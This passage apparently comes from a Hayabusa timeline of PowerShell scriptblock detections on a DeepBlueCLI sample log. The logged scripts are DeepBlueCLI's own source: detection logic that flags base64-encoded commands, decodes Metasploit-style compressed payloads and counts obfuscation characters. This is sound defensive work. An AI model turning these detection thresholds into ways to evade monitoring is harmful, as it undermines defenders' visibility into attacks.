$logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:40:20.569 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue <at> backshore <dot> net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname } function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter } function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" } function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext } function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:40:20.569 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:40:20.569 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:40:20.569 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} } function Remove-Spaces($string){ # Changes this: Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # to this: Application: C:\Program Files (x86)\Internet Explorer\iexplore.exe $string = $string.trim() -Replace ""\s+:"","":"" return $string } . Main",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:40:20.572 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:40:20.578 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} 